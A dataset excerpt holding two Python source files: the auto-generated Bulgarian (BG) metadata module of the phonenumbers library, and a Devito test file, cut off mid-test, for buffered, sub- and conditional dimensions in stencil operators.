| repo_name (5–104 chars) | path (4–248 chars) | content (102–99.9k chars) |
|---|---|---|
ayushgoel/FixGoogleContacts
|
phonenumbers/data/region_BG.py
|
"""Auto-generated file, do not edit by hand. BG metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_BG = PhoneMetadata(id='BG', country_code=359, international_prefix='00',
general_desc=PhoneNumberDesc(national_number_pattern='[23567]\\d{5,7}|[489]\\d{6,8}', possible_number_pattern='\\d{5,9}'),
fixed_line=PhoneNumberDesc(national_number_pattern='2(?:[0-8]\\d{5,6}|9\\d{4,6})|(?:[36]\\d|5[1-9]|8[1-6]|9[1-7])\\d{5,6}|(?:4(?:[124-7]\\d|3[1-6])|7(?:0[1-9]|[1-9]\\d))\\d{4,5}', possible_number_pattern='\\d{5,8}', example_number='2123456'),
mobile=PhoneNumberDesc(national_number_pattern='(?:8[7-9]|98)\\d{7}|4(?:3[0789]|8\\d)\\d{5}', possible_number_pattern='\\d{8,9}', example_number='48123456'),
toll_free=PhoneNumberDesc(national_number_pattern='800\\d{5}', possible_number_pattern='\\d{8}', example_number='80012345'),
premium_rate=PhoneNumberDesc(national_number_pattern='90\\d{6}', possible_number_pattern='\\d{8}', example_number='90123456'),
shared_cost=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
personal_number=PhoneNumberDesc(national_number_pattern='700\\d{5}', possible_number_pattern='\\d{5,9}', example_number='70012345'),
voip=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
pager=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
uan=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
emergency=PhoneNumberDesc(national_number_pattern='1(?:12|50|6[06])', possible_number_pattern='\\d{3}', example_number='112'),
voicemail=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
short_code=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
standard_rate=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
no_international_dialling=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
national_prefix='0',
national_prefix_for_parsing='0',
number_format=[NumberFormat(pattern='(2)(\\d{5})', format='\\1 \\2', leading_digits_pattern=['29'], national_prefix_formatting_rule='0\\1'),
NumberFormat(pattern='(2)(\\d{3})(\\d{3,4})', format='\\1 \\2 \\3', leading_digits_pattern=['2'], national_prefix_formatting_rule='0\\1'),
NumberFormat(pattern='(\\d{3})(\\d{4})', format='\\1 \\2', leading_digits_pattern=['43[124-7]|70[1-9]'], national_prefix_formatting_rule='0\\1'),
NumberFormat(pattern='(\\d{3})(\\d{3})(\\d{2})', format='\\1 \\2 \\3', leading_digits_pattern=['43[124-7]|70[1-9]'], national_prefix_formatting_rule='0\\1'),
NumberFormat(pattern='(\\d{3})(\\d{2})(\\d{3})', format='\\1 \\2 \\3', leading_digits_pattern=['[78]00'], national_prefix_formatting_rule='0\\1'),
NumberFormat(pattern='(\\d{2})(\\d{3})(\\d{2,3})', format='\\1 \\2 \\3', leading_digits_pattern=['[356]|4[124-7]|7[1-9]|8[1-6]|9[1-7]'], national_prefix_formatting_rule='0\\1'),
NumberFormat(pattern='(\\d{2})(\\d{3})(\\d{3,4})', format='\\1 \\2 \\3', leading_digits_pattern=['48|8[7-9]|9[08]'], national_prefix_formatting_rule='0\\1')])
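# A minimal usage sketch (illustrative, not part of the auto-generated
# metadata), assuming the `phonenumbers` package is installed; '2123456' is
# the fixed_line example_number declared above.
if __name__ == "__main__":
    import phonenumbers
    num = phonenumbers.parse("2123456", "BG")
    assert phonenumbers.is_valid_number(num)
    # The '(2)(\d{3})(\d{3,4})' rule above yields '+359 2 123 456'
    print(phonenumbers.format_number(num, phonenumbers.PhoneNumberFormat.INTERNATIONAL))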
|
opesci/devito
|
tests/test_dimension.py
|
from itertools import product
import numpy as np
from sympy import And
import pytest
from conftest import skipif, opts_tiling
from devito import (ConditionalDimension, Grid, Function, TimeFunction, SparseFunction, # noqa
Eq, Operator, Constant, Dimension, SubDimension, switchconfig,
SubDomain, Lt, Le, Gt, Ge, Ne, Buffer)
from devito.ir.iet import (Conditional, Expression, Iteration, FindNodes,
retrieve_iteration_tree)
from devito.symbolics import indexify, retrieve_functions, IntDiv
from devito.types import Array
class TestBufferedDimension(object):
def test_multi_buffer(self):
grid = Grid((3, 3))
f = TimeFunction(name="f", grid=grid)
g = TimeFunction(name="g", grid=grid, save=Buffer(7))
op = Operator([Eq(f.forward, 1), Eq(g, f.forward)])
op(time_M=3)
# f cycled through its whole time buffer and is 1 everywhere
assert np.allclose(f.data, 1)
# g looped indices 0 to 3, rest is still 0
assert np.allclose(g.data[0:4], 1)
assert np.allclose(g.data[4:], 0)
def test_multi_buffer_long_time(self):
grid = Grid((3, 3))
time = grid.time_dim
f = TimeFunction(name="f", grid=grid)
g = TimeFunction(name="g", grid=grid, save=Buffer(7))
op = Operator([Eq(f.forward, time), Eq(g, time+1)])
op(time_M=20)
# f[0] is time=19, f[1] is time=20
assert np.allclose(f.data[0], 19)
assert np.allclose(f.data[1], 20)
# g holds times 15 to 21 (the 7-slot buffer has wrapped; the final writes are 15->21)
for i in range(7):
assert np.allclose(g.data[i], 14+i+1)
class TestSubDimension(object):
@pytest.mark.parametrize('opt', opts_tiling)
def test_interior(self, opt):
"""
Tests application of an Operator consisting of a single equation
over the ``interior`` subdomain.
"""
grid = Grid(shape=(4, 4, 4))
x, y, z = grid.dimensions
interior = grid.interior
u = TimeFunction(name='u', grid=grid)
eqn = [Eq(u.forward, u + 2, subdomain=interior)]
op = Operator(eqn, opt=opt)
op.apply(time_M=2)
assert np.all(u.data[1, 1:-1, 1:-1, 1:-1] == 6.)
assert np.all(u.data[1, :, 0] == 0.)
assert np.all(u.data[1, :, -1] == 0.)
assert np.all(u.data[1, :, :, 0] == 0.)
assert np.all(u.data[1, :, :, -1] == 0.)
def test_domain_vs_interior(self):
"""
Tests application of an Operator consisting of two equations, one
over the whole domain (default), and one over the ``interior`` subdomain.
"""
grid = Grid(shape=(4, 4, 4))
x, y, z = grid.dimensions
t = grid.stepping_dim # noqa
interior = grid.interior
u = TimeFunction(name='u', grid=grid) # noqa
eqs = [Eq(u.forward, u + 1),
Eq(u.forward, u.forward + 2, subdomain=interior)]
op = Operator(eqs, opt='noop')
trees = retrieve_iteration_tree(op)
assert len(trees) == 2
op.apply(time_M=1)
assert np.all(u.data[1, 0, :, :] == 1)
assert np.all(u.data[1, -1, :, :] == 1)
assert np.all(u.data[1, :, 0, :] == 1)
assert np.all(u.data[1, :, -1, :] == 1)
assert np.all(u.data[1, :, :, 0] == 1)
assert np.all(u.data[1, :, :, -1] == 1)
assert np.all(u.data[1, 1:3, 1:3, 1:3] == 3)
@pytest.mark.parametrize('opt', opts_tiling)
def test_subdim_middle(self, opt):
"""
Tests that instantiating SubDimensions using the classmethod
constructors works correctly.
"""
grid = Grid(shape=(4, 4, 4))
x, y, z = grid.dimensions
t = grid.stepping_dim # noqa
u = TimeFunction(name='u', grid=grid) # noqa
xi = SubDimension.middle(name='xi', parent=x,
thickness_left=1,
thickness_right=1)
eqs = [Eq(u.forward, u + 1)]
eqs = [e.subs(x, xi) for e in eqs]
op = Operator(eqs, opt=opt)
u.data[:] = 1.0
op.apply(time_M=1)
assert np.all(u.data[1, 0, :, :] == 1)
assert np.all(u.data[1, -1, :, :] == 1)
assert np.all(u.data[1, 1:3, :, :] == 2)
def test_symbolic_size(self):
"""Check the symbolic size of all possible SubDimensions is as expected."""
grid = Grid(shape=(4,))
x, = grid.dimensions
thickness = 4
xleft = SubDimension.left(name='xleft', parent=x, thickness=thickness)
assert xleft.symbolic_size == xleft.thickness.left[0]
xi = SubDimension.middle(name='xi', parent=x,
thickness_left=thickness, thickness_right=thickness)
assert xi.symbolic_size == (x.symbolic_max - x.symbolic_min -
xi.thickness.left[0] - xi.thickness.right[0] + 1)
xright = SubDimension.right(name='xright', parent=x, thickness=thickness)
assert xright.symbolic_size == xright.thickness.right[0]
@pytest.mark.parametrize('opt', opts_tiling)
def test_bcs(self, opt):
"""
Tests application of an Operator consisting of multiple equations
defined over different sub-regions, explicitly created through the
use of SubDimensions.
"""
grid = Grid(shape=(20, 20))
x, y = grid.dimensions
t = grid.stepping_dim
thickness = 4
u = TimeFunction(name='u', save=None, grid=grid, space_order=0, time_order=1)
xleft = SubDimension.left(name='xleft', parent=x, thickness=thickness)
xi = SubDimension.middle(name='xi', parent=x,
thickness_left=thickness, thickness_right=thickness)
xright = SubDimension.right(name='xright', parent=x, thickness=thickness)
yi = SubDimension.middle(name='yi', parent=y,
thickness_left=thickness, thickness_right=thickness)
t_in_centre = Eq(u[t+1, xi, yi], 1)
leftbc = Eq(u[t+1, xleft, yi], u[t+1, xleft+1, yi] + 1)
rightbc = Eq(u[t+1, xright, yi], u[t+1, xright-1, yi] + 1)
op = Operator([t_in_centre, leftbc, rightbc], opt=opt)
op.apply(time_m=1, time_M=1)
assert np.all(u.data[0, :, 0:thickness] == 0.)
assert np.all(u.data[0, :, -thickness:] == 0.)
assert all(np.all(u.data[0, i, thickness:-thickness] == (thickness+1-i))
for i in range(thickness))
assert all(np.all(u.data[0, -i, thickness:-thickness] == (thickness+2-i))
for i in range(1, thickness + 1))
assert np.all(u.data[0, thickness:-thickness, thickness:-thickness] == 1.)
def test_flow_detection_interior(self):
"""
Test detection of flow directions when SubDimensions are used
(in this test they are induced by the ``interior`` subdomain).
The stencil uses values at the new timestep as well as those at previous ones.
This forces an evaluation order onto x.
Weights are:
x=0 x=1 x=2 x=3
t=N 2 ---3
v /
t=N+1 o--+----4
Flow dependency should traverse x in the negative direction
x=2 x=3 x=4 x=5 x=6
t=0 0 --- 0 -- 1 -- 0
v / v / v /
t=1 44 -+--- 11 -+--- 2--+ -- 0
"""
grid = Grid(shape=(10, 10))
x, y = grid.dimensions
interior = grid.interior
u = TimeFunction(name='u', grid=grid, save=10, time_order=1, space_order=0)
step = Eq(u.forward, 2*u
+ 3*u.subs(x, x+x.spacing)
+ 4*u.forward.subs(x, x+x.spacing),
subdomain=interior)
op = Operator(step)
u.data[0, 5, 5] = 1.0
op.apply(time_M=0)
assert u.data[1, 5, 5] == 2
assert u.data[1, 4, 5] == 11
assert u.data[1, 3, 5] == 44
assert u.data[1, 2, 5] == 4*44
assert u.data[1, 1, 5] == 4*4*44
# This point isn't updated because of the `interior` selection
assert u.data[1, 0, 5] == 0
assert np.all(u.data[1, 6:, :] == 0)
assert np.all(u.data[1, :, 0:5] == 0)
assert np.all(u.data[1, :, 6:] == 0)
@pytest.mark.parametrize('exprs,expected,', [
# Carried dependence in both /t/ and /x/
(['Eq(u[t+1, x, y], u[t+1, x-1, y] + u[t, x, y])'], 'y'),
(['Eq(u[t+1, x, y], u[t+1, x-1, y] + u[t, x, y], subdomain=interior)'], 'i0y'),
# Carried dependence in both /t/ and /y/
(['Eq(u[t+1, x, y], u[t+1, x, y-1] + u[t, x, y])'], 'x'),
(['Eq(u[t+1, x, y], u[t+1, x, y-1] + u[t, x, y], subdomain=interior)'], 'i0x'),
# Carried dependence in /y/, leading to separate /y/ loops, one
# going forward, the other backward
(['Eq(u[t+1, x, y], u[t+1, x, y-1] + u[t, x, y], subdomain=interior)',
'Eq(u[t+1, x, y], u[t+1, x, y+1] + u[t, x, y], subdomain=interior)'], 'i0x'),
])
def test_iteration_property_parallel(self, exprs, expected):
"""Tests detection of sequental and parallel Iterations when applying
equations over different subdomains."""
grid = Grid(shape=(20, 20))
x, y = grid.dimensions # noqa
t = grid.time_dim # noqa
interior = grid.interior # noqa
u = TimeFunction(name='u', grid=grid, save=10, time_order=1) # noqa
# List comprehension would need explicit locals/globals mappings to eval
for i, e in enumerate(list(exprs)):
exprs[i] = eval(e)
op = Operator(exprs, opt='noop')
iterations = FindNodes(Iteration).visit(op)
assert all(i.is_Sequential for i in iterations if i.dim.name != expected)
assert all(i.is_Parallel for i in iterations if i.dim.name == expected)
@skipif(['device'])
@pytest.mark.parametrize('exprs,expected,', [
# All parallel, the innermost Iteration gets vectorized
(['Eq(u[time, x, yleft], u[time, x, yleft] + 1.)'], ['yleft']),
# All outers are parallel, carried dependence in `yleft`, so the middle
# Iteration over `x` gets vectorized
(['Eq(u[time, x, yleft], u[time, x, yleft+1] + 1.)'], ['x']),
# Only the middle Iteration is parallel, so no vectorization (the Iteration
# is left non-vectorised for OpenMP parallelism)
(['Eq(u[time+1, x, yleft], u[time, x, yleft+1] + u[time+1, x, yleft+1])'], [])
])
def test_iteration_property_vector(self, exprs, expected):
"""Tests detection of vector Iterations when using subdimensions."""
grid = Grid(shape=(20, 20))
x, y = grid.dimensions # noqa
time = grid.time_dim # noqa
# The leftmost 10 elements
yleft = SubDimension.left(name='yleft', parent=y, thickness=10) # noqa
u = TimeFunction(name='u', grid=grid, save=10, time_order=0, space_order=1) # noqa
# List comprehension would need explicit locals/globals mappings to eval
for i, e in enumerate(list(exprs)):
exprs[i] = eval(e)
op = Operator(exprs, opt='simd')
iterations = FindNodes(Iteration).visit(op)
vectorized = [i.dim.name for i in iterations if i.is_Vectorized]
assert set(vectorized) == set(expected)
@pytest.mark.parametrize('opt', opts_tiling)
def test_subdimmiddle_parallel(self, opt):
"""
Tests application of an Operator over a sub-region of the domain,
explicitly created through the use of SubDimensions.
"""
grid = Grid(shape=(20, 20))
x, y = grid.dimensions
t = grid.stepping_dim
thickness = 4
u = TimeFunction(name='u', save=None, grid=grid, space_order=0, time_order=1)
xi = SubDimension.middle(name='xi', parent=x,
thickness_left=thickness, thickness_right=thickness)
yi = SubDimension.middle(name='yi', parent=y,
thickness_left=thickness, thickness_right=thickness)
# a 5 point stencil that can be computed in parallel
centre = Eq(u[t+1, xi, yi], u[t, xi, yi] + u[t, xi-1, yi]
+ u[t, xi+1, yi] + u[t, xi, yi-1] + u[t, xi, yi+1])
u.data[0, 10, 10] = 1.0
op = Operator([centre], opt=opt)
print(op.ccode)
iterations = FindNodes(Iteration).visit(op)
assert all(i.is_Affine and i.is_Parallel for i in iterations if i.dim in [xi, yi])
op.apply(time_m=0, time_M=0)
assert np.all(u.data[1, 9:12, 10] == 1.0)
assert np.all(u.data[1, 10, 9:12] == 1.0)
# Other than those, it should all be 0
u.data[1, 9:12, 10] = 0.0
u.data[1, 10, 9:12] = 0.0
assert np.all(u.data[1, :] == 0)
def test_subdimleft_parallel(self):
"""
Tests application of an Operator over a sub-region of the domain,
explicitly created through the use of SubDimensions.
This tests that flow direction is not being automatically inferred
from whether the subdimension is on the left or right boundary.
"""
grid = Grid(shape=(20, 20))
x, y = grid.dimensions
t = grid.stepping_dim
thickness = 4
u = TimeFunction(name='u', save=None, grid=grid, space_order=0, time_order=1)
xl = SubDimension.left(name='xl', parent=x, thickness=thickness)
yi = SubDimension.middle(name='yi', parent=y,
thickness_left=thickness, thickness_right=thickness)
# Can be done in parallel
eq = Eq(u[t+1, xl, yi], u[t, xl, yi] + 1)
op = Operator([eq])
iterations = FindNodes(Iteration).visit(op)
assert all(i.is_Affine and i.is_Parallel for i in iterations if i.dim in [xl, yi])
op.apply(time_m=0, time_M=0)
assert np.all(u.data[1, 0:thickness, 0:thickness] == 0)
assert np.all(u.data[1, 0:thickness, -thickness:] == 0)
assert np.all(u.data[1, 0:thickness, thickness:-thickness] == 1)
assert np.all(u.data[1, thickness+1:, :] == 0)
def test_subdimmiddle_notparallel(self):
"""
Tests application of an Operator over a sub-region of the domain,
explicitly created through the use of SubDimensions.
Different from ``test_subdimmiddle_parallel`` because an interior
dimension cannot be evaluated in parallel.
"""
grid = Grid(shape=(20, 20))
x, y = grid.dimensions
t = grid.stepping_dim
thickness = 4
u = TimeFunction(name='u', save=None, grid=grid, space_order=0, time_order=1)
xi = SubDimension.middle(name='xi', parent=x,
thickness_left=thickness, thickness_right=thickness)
yi = SubDimension.middle(name='yi', parent=y,
thickness_left=thickness, thickness_right=thickness)
# flow dependencies in x and y which should force serial execution
# in reverse direction
centre = Eq(u[t+1, xi, yi], u[t, xi, yi] + u[t+1, xi+1, yi+1])
u.data[0, 10, 10] = 1.0
op = Operator([centre])
iterations = FindNodes(Iteration).visit(op)
assert all(i.is_Affine and i.is_Sequential for i in iterations if i.dim == xi)
assert all(i.is_Affine and i.is_Parallel for i in iterations if i.dim == yi)
op.apply(time_m=0, time_M=0)
for i in range(4, 11):
assert u.data[1, i, i] == 1.0
u.data[1, i, i] = 0.0
assert np.all(u.data[1, :] == 0)
def test_subdimleft_notparallel(self):
"""
Tests application of an Operator over a sub-region of the domain,
explicitly created through the use of SubDimensions.
This tests that flow direction is not being automatically inferred
from whether the subdimension is on the left or right boundary.
"""
grid = Grid(shape=(20, 20))
x, y = grid.dimensions
t = grid.stepping_dim
thickness = 4
u = TimeFunction(name='u', save=None, grid=grid, space_order=1, time_order=0)
xl = SubDimension.left(name='xl', parent=x, thickness=thickness)
yi = SubDimension.middle(name='yi', parent=y,
thickness_left=thickness, thickness_right=thickness)
# Flows inward (i.e. forward) rather than outward
eq = Eq(u[t+1, xl, yi], u[t+1, xl-1, yi] + 1)
op = Operator([eq])
iterations = FindNodes(Iteration).visit(op)
assert all(i.is_Affine and i.is_Sequential for i in iterations if i.dim == xl)
assert all(i.is_Affine and i.is_Parallel for i in iterations if i.dim == yi)
op.apply(time_m=1, time_M=1)
assert all(np.all(u.data[0, :thickness, thickness+i] == [1, 2, 3, 4])
for i in range(12))
assert np.all(u.data[0, thickness:] == 0)
assert np.all(u.data[0, :, thickness+12:] == 0)
def test_subdim_fd(self):
"""
Test that the FD shortcuts are handled correctly with SubDimensions
"""
grid = Grid(shape=(20, 20))
x, y = grid.dimensions
u = TimeFunction(name='u', save=None, grid=grid, space_order=1, time_order=1)
u.data[:] = 2.
# Apply the FD shortcuts over the interior subdomain
eq = [Eq(u.forward, u.dx + u.dy, subdomain=grid.interior)]
op = Operator(eq)
op.apply(time_M=0)
assert np.all(u.data[1, -1, :] == 2.)
assert np.all(u.data[1, :, 0] == 2.)
assert np.all(u.data[1, :, -1] == 2.)
assert np.all(u.data[1, 0, :] == 2.)
assert np.all(u.data[1, 1:18, 1:18] == 0.)
def test_arrays_defined_over_subdims(self):
"""
Check code generation when an Array uses a SubDimension.
"""
grid = Grid(shape=(3,))
x, = grid.dimensions
xi, = grid.interior.dimensions
f = Function(name='f', grid=grid)
a = Array(name='a', dimensions=(xi,), dtype=grid.dtype)
op = Operator([Eq(a[xi], 1), Eq(f, f + a[xi + 1], subdomain=grid.interior)],
openmp=False)
assert len(op.parameters) == 6
# neither `x_size` nor `xi_size` is expected here
assert not any(i.name in ('x_size', 'xi_size') for i in op.parameters)
# Try running it -- regardless of what it will produce, this should run
# i.e., this checks that this error isn't raised:
# "ValueError: No value found for parameter xi_size"
op()
@pytest.mark.parametrize('opt', opts_tiling)
def test_expandingbox_like(self, opt):
"""
Make sure SubDimensions aren't an obstacle to expanding boxes.
"""
grid = Grid(shape=(8, 8))
x, y = grid.dimensions
u = TimeFunction(name='u', grid=grid)
xi = SubDimension.middle(name='xi', parent=x, thickness_left=2, thickness_right=2)
yi = SubDimension.middle(name='yi', parent=y, thickness_left=2, thickness_right=2)
eqn = Eq(u.forward, u + 1)
eqn = eqn.subs({x: xi, y: yi})
op = Operator(eqn, opt=opt)
op.apply(time=3, x_m=2, x_M=5, y_m=2, y_M=5,
xi_ltkn=0, xi_rtkn=0, yi_ltkn=0, yi_rtkn=0)
assert np.all(u.data[0, 2:-2, 2:-2] == 4.)
assert np.all(u.data[1, 2:-2, 2:-2] == 3.)
assert np.all(u.data[:, :2] == 0.)
assert np.all(u.data[:, -2:] == 0.)
assert np.all(u.data[:, :, :2] == 0.)
assert np.all(u.data[:, :, -2:] == 0.)
class TestConditionalDimension(object):
"""
A collection of tests to check the correct functioning of ConditionalDimensions.
"""
def test_basic(self):
nt = 19
grid = Grid(shape=(11, 11))
time = grid.time_dim
u = TimeFunction(name='u', grid=grid)
assert(grid.stepping_dim in u.indices)
u2 = TimeFunction(name='u2', grid=grid, save=nt)
assert(time in u2.indices)
factor = 4
time_subsampled = ConditionalDimension('t_sub', parent=time, factor=factor)
usave = TimeFunction(name='usave', grid=grid, save=(nt+factor-1)//factor,
time_dim=time_subsampled)
assert(time_subsampled in usave.indices)
eqns = [Eq(u.forward, u + 1.), Eq(u2.forward, u2 + 1.), Eq(usave, u)]
op = Operator(eqns)
op.apply(t_M=nt-2)
assert np.all(np.allclose(u.data[(nt-1) % 3], nt-1))
assert np.all([np.allclose(u2.data[i], i) for i in range(nt)])
assert np.all([np.allclose(usave.data[i], i*factor)
for i in range((nt+factor-1)//factor)])
def test_basic_shuffles(self):
"""
Like ``test_basic``, but with different equation orderings. Nevertheless,
we assert against the same exact values as in ``test_basic``, since we
save `u`, not `u.forward`.
"""
nt = 19
grid = Grid(shape=(11, 11))
time = grid.time_dim
u = TimeFunction(name='u', grid=grid)
u2 = TimeFunction(name='u2', grid=grid, save=nt)
factor = 4
time_subsampled = ConditionalDimension('t_sub', parent=time, factor=factor)
usave = TimeFunction(name='usave', grid=grid, save=(nt+factor-1)//factor,
time_dim=time_subsampled)
# Shuffle 1
eqns = [Eq(usave, u), Eq(u.forward, u + 1.), Eq(u2.forward, u2 + 1.)]
op = Operator(eqns)
op.apply(t_M=nt-2)
assert np.all(np.allclose(u.data[(nt-1) % 3], nt-1))
assert np.all([np.allclose(u2.data[i], i) for i in range(nt)])
assert np.all([np.allclose(usave.data[i], i*factor)
for i in range((nt+factor-1)//factor)])
# Shuffle 2
usave.data[:] = 0.
u.data[:] = 0.
u2.data[:] = 0.
eqns = [Eq(u.forward, u + 1.), Eq(usave, u), Eq(u2.forward, u2 + 1.)]
op = Operator(eqns)
op.apply(t_M=nt-2)
assert np.all(np.allclose(u.data[(nt-1) % 3], nt-1))
assert np.all([np.allclose(u2.data[i], i) for i in range(nt)])
assert np.all([np.allclose(usave.data[i], i*factor)
for i in range((nt+factor-1)//factor)])
@pytest.mark.parametrize('opt', opts_tiling)
def test_spacial_subsampling(self, opt):
"""
Test ConditionalDimension for spatial dimensions.
This test saves u at every other grid point:
u2[x, y] = u[2*x, 2*y]
"""
nt = 19
grid = Grid(shape=(11, 11))
time = grid.time_dim
u = TimeFunction(name='u', grid=grid, save=nt)
assert(grid.time_dim in u.indices)
# Create subsampled spatial dimensions and a matching grid
dims = tuple([ConditionalDimension(d.name+'sub', parent=d, factor=2)
for d in u.grid.dimensions])
grid2 = Grid((6, 6), dimensions=dims, time_dimension=time)
u2 = TimeFunction(name='u2', grid=grid2, save=nt)
assert(time in u2.indices)
eqns = [Eq(u.forward, u + 1.), Eq(u2, u)]
op = Operator(eqns, opt=opt)
op.apply(time_M=nt-2)
# Verify that u2[x,y]= u[2*x, 2*y]
assert np.allclose(u.data[:-1, 0::2, 0::2], u2.data[:-1, :, :])
def test_time_subsampling_fd(self):
nt = 19
grid = Grid(shape=(11, 11))
x, y = grid.dimensions
time = grid.time_dim
factor = 4
time_subsampled = ConditionalDimension('t_sub', parent=time, factor=factor)
usave = TimeFunction(name='usave', grid=grid, save=(nt+factor-1)//factor,
time_dim=time_subsampled, time_order=2)
dx2 = [indexify(i) for i in retrieve_functions(usave.dt2.evaluate)]
assert dx2 == [usave[time_subsampled - 1, x, y],
usave[time_subsampled + 1, x, y],
usave[time_subsampled, x, y]]
def test_issue_1592(self):
grid = Grid(shape=(11, 11))
time = grid.time_dim
time_sub = ConditionalDimension('t_sub', parent=time, factor=2)
v = TimeFunction(name="v", grid=grid, space_order=4, time_dim=time_sub, save=5)
w = Function(name="w", grid=grid, space_order=4)
Operator(Eq(w, v.dx))(time=6)
op = Operator(Eq(v.forward, v.dx))
op.apply(time=6)
exprs = FindNodes(Expression).visit(op)
assert exprs[-1].expr.lhs.indices[0] == IntDiv(time, 2) + 1
def test_subsampled_fd(self):
"""
Test that the FD shortcuts are handled correctly with ConditionalDimensions
"""
grid = Grid(shape=(11, 11))
time = grid.time_dim
# Create subsampled spatial dimensions and a matching grid
dims = tuple([ConditionalDimension(d.name+'sub', parent=d, factor=2)
for d in grid.dimensions])
grid2 = Grid((6, 6), dimensions=dims, time_dimension=time)
u2 = TimeFunction(name='u2', grid=grid2, space_order=2, time_order=1)
u2.data.fill(2.)
eqns = [Eq(u2.forward, u2.dx + u2.dy)]
op = Operator(eqns)
op.apply(time_M=0, x_M=11, y_M=11)
# Verify that u2 contains subsampled fd values
assert np.all(u2.data[0, :, :] == 2.)
assert np.all(u2.data[1, 0, 0] == 0.)
assert np.all(u2.data[1, -1, -1] == -20.)
assert np.all(u2.data[1, 0, -1] == -10.)
assert np.all(u2.data[1, -1, 0] == -10.)
assert np.all(u2.data[1, 1:-1, 0] == 0.)
assert np.all(u2.data[1, 0, 1:-1] == 0.)
assert np.all(u2.data[1, 1:-1, -1] == -10.)
assert np.all(u2.data[1, -1, 1:-1] == -10.)
assert np.all(u2.data[1, 1:4, 1:4] == 0.)
# This test generates an OpenMP loop form which makes older GCCs upset
@switchconfig(openmp=False)
def test_nothing_in_negative(self):
"""Test the case where when the condition is false, there is nothing to do."""
nt = 4
grid = Grid(shape=(11, 11))
time = grid.time_dim
u = TimeFunction(name='u', save=nt, grid=grid)
assert(grid.time_dim in u.indices)
factor = 4
time_subsampled = ConditionalDimension('t_sub', parent=time, factor=factor)
usave = TimeFunction(name='usave', grid=grid, save=(nt+factor-1)//factor,
time_dim=time_subsampled)
assert(time_subsampled in usave.indices)
eqns = [Eq(usave, u)]
op = Operator(eqns)
u.data[:] = 1.0
usave.data[:] = 0.0
op.apply(time_m=1, time_M=1)
assert np.allclose(usave.data, 0.0)
op.apply(time_m=0, time_M=0)
assert np.allclose(usave.data, 1.0)
def test_laplace(self):
grid = Grid(shape=(20, 20, 20))
x, y, z = grid.dimensions
time = grid.time_dim
t = grid.stepping_dim
tsave = ConditionalDimension(name='tsave', parent=time, factor=2)
u = TimeFunction(name='u', grid=grid, save=None, time_order=2)
usave = TimeFunction(name='usave', grid=grid, time_dim=tsave,
time_order=0, space_order=0)
steps = []
# save a snapshot
steps.append(Eq(usave, u))
# standard laplace-like thing
steps.append(Eq(u[t+1, x, y, z],
u[t, x, y, z] - u[t-1, x, y, z]
+ u[t, x-1, y, z] + u[t, x+1, y, z]
+ u[t, x, y-1, z] + u[t, x, y+1, z]
+ u[t, x, y, z-1] + u[t, x, y, z+1]))
op = Operator(steps)
u.data[:] = 0.0
u.data[0, 10, 10, 10] = 1.0
op.apply(time_m=0, time_M=0)
assert np.sum(u.data[0, :, :, :]) == 1.0
assert np.sum(u.data[1, :, :, :]) == 7.0
assert np.all(usave.data[0, :, :, :] == u.data[0, :, :, :])
def test_as_expr(self):
nt = 19
grid = Grid(shape=(11, 11))
time = grid.time_dim
u = TimeFunction(name='u', grid=grid)
assert(grid.stepping_dim in u.indices)
u2 = TimeFunction(name='u2', grid=grid, save=nt)
assert(time in u2.indices)
factor = 4
time_subsampled = ConditionalDimension('t_sub', parent=time, factor=factor)
usave = TimeFunction(name='usave', grid=grid, save=(nt+factor-1)//factor,
time_dim=time_subsampled)
assert(time_subsampled in usave.indices)
eqns = [Eq(u.forward, u + 1.), Eq(u2.forward, u2 + 1.),
Eq(usave, time_subsampled * u)]
op = Operator(eqns)
op.apply(t=nt-2)
assert np.all(np.allclose(u.data[(nt-1) % 3], nt-1))
assert np.all([np.allclose(u2.data[i], i) for i in range(nt)])
assert np.all([np.allclose(usave.data[i], i*factor*i)
for i in range((nt+factor-1)//factor)])
def test_shifted(self):
nt = 19
grid = Grid(shape=(11, 11))
time = grid.time_dim
u = TimeFunction(name='u', grid=grid)
assert(grid.stepping_dim in u.indices)
u2 = TimeFunction(name='u2', grid=grid, save=nt)
assert(time in u2.indices)
factor = 4
time_subsampled = ConditionalDimension('t_sub', parent=time, factor=factor)
usave = TimeFunction(name='usave', grid=grid, save=2, time_dim=time_subsampled)
assert(time_subsampled in usave.indices)
t_sub_shift = Constant(name='t_sub_shift', dtype=np.int32)
eqns = [Eq(u.forward, u + 1.), Eq(u2.forward, u2 + 1.),
Eq(usave.subs(time_subsampled, time_subsampled - t_sub_shift), u)]
op = Operator(eqns)
# Starting at time_m=10, so time_subsampled - t_sub_shift is in range
op.apply(time_m=10, time_M=nt-2, t_sub_shift=3)
assert np.all(np.allclose(u.data[0], 8))
assert np.all([np.allclose(u2.data[i], i - 10) for i in range(10, nt)])
assert np.all([np.allclose(usave.data[i], 2+i*factor) for i in range(2)])
def test_no_index(self):
"""Test behaviour when the ConditionalDimension is used as a symbol in
an expression."""
nt = 19
grid = Grid(shape=(11, 11))
time = grid.time_dim
u = TimeFunction(name='u', grid=grid)
assert(grid.stepping_dim in u.indices)
v = Function(name='v', grid=grid)
factor = 4
time_subsampled = ConditionalDimension('t_sub', parent=time, factor=factor)
eqns = [Eq(u.forward, u + 1), Eq(v, v + u*u*time_subsampled)]
op = Operator(eqns)
op.apply(t_M=nt-2)
assert np.all(np.allclose(u.data[(nt-1) % 3], nt-1))
# expected result is 1600
# v = u[0]**2 * 0 + u[4]**2 * 1 + u[8]**2 * 2 + u[12]**2 * 3 + u[16]**2 * 4
# with u[t] = t
# v = 16 * 1 + 64 * 2 + 144 * 3 + 256 * 4 = 1600
assert np.all(np.allclose(v.data, 1600))
def test_no_index_sparse(self):
"""Test behaviour when the ConditionalDimension is used as a symbol in
an expression over sparse data objects."""
grid = Grid(shape=(4, 4), extent=(3.0, 3.0))
time = grid.time_dim
f = TimeFunction(name='f', grid=grid, save=1)
f.data[:] = 0.
coordinates = [(0.5, 0.5), (0.5, 2.5), (2.5, 0.5), (2.5, 2.5)]
